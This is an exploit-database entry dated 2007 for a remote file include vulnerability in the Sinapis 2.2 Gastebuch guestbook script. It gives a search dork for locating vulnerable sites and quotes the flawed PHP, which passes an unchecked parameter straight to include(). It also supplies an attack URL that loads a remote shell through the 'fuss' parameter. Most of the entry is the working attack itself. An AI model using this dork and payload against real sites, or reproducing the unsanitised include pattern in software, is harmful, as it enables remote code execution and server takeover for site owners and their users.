Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability

2007-02-23T00:00:00
ID 1337DAY-ID-1536
Type zdt
Reporter kezzap66345
Modified 2007-02-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================================
Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability
=========================================================================




Sinapis 2.2 Gastebuch

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20G?stebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="inurl:sinagb.php"
*****************
ERROR:

if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);}       <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinagb.php?fuss=[SHELL]


******thanx=x0r0n*str0ke*shika********************************************************




#  0day.today [2018-01-03]  #